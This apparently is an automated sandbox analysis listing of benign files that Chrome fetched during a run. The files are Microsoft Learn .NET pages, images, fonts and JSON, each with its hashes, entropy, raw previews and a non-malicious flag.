                                                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):19696
                                                                                                                                                                                                        Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                        MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                        SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                        SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                        SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                        Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):47062
                                                                                                                                                                                                        Entropy (8bit):5.016115705165622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                        MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                        SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                        SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                        SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
